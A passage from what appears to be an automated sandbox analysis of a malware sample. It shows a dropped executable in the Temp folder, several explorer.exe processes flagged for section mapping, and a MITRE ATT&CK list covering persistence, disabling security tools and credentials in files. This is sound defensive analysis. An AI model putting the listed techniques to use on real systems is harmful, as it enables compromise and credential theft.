- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1560

C:\Users\Admin\AppData\Local\Temp\BF2A.exe
C:\Users\Admin\AppData\Local\Temp\BF2A.exe
1⤵
- Executes dropped EXE
PID:5272

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3976

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5660

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5984

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5340

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2000

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:4456

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4856

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:4196

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3328

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5832

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3860
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3860 -s 2004
  2⤵
  - Program crash
  PID:2900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5824

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4964

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery